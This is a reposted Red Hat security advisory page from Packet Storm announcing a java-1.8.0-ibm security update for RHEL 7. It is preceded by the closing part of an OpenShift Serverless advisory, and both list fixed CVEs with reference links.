Fix(es):* go-git: Maliciously crafted Git server replies can cause DoS on go-git clients (CVE-2023-49568)* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)A Red Hat Security Bulletin, which addresses further details about the RapidReset flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31CVEs:CVE-2023-39326References:https://access.redhat.com/security/updates/classification/#criticalhttps://access.redhat.com/documentation/en-us/red_hat_openshift_serverless/1.31https://bugzilla.redhat.com/show_bug.cgi?id=2253330https://bugzilla.redhat.com/show_bug.cgi?id=2254210https://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0880-03

Red Hat Security Advisory 2024-0879-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary. Issues addressed include denial of service and deserialization vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0879.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: java-1.8.0-ibm security update  
Advisory ID:        RHSA-2024:0879-03  
Product:            Red Hat Enterprise Linux Supplementary  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0879  
Issue date:         2024-02-20  
Revision:           03  
CVE Names:          CVE-2023-5676  
====================================================================

Summary: 

An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 7 Supplementary.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.

This update upgrades IBM Java SE 8 to version 8 SR8-FP15.

Security Fix(es):

* IBM JDK: Eclipse OpenJ9 JVM denial of service (CVE-2023-5676)

* OpenJDK: IOR deserialization issue in CORBA (8303384) (CVE-2023-22067)

* OpenJDK: certificate path validation issue during client authentication (8309966) (CVE-2023-22081)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5676

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2243627  
https://bugzilla.redhat.com/show_bug.cgi?id=2243637  
https://bugzilla.redhat.com/show_bug.cgi?id=2250255

Tag

#linux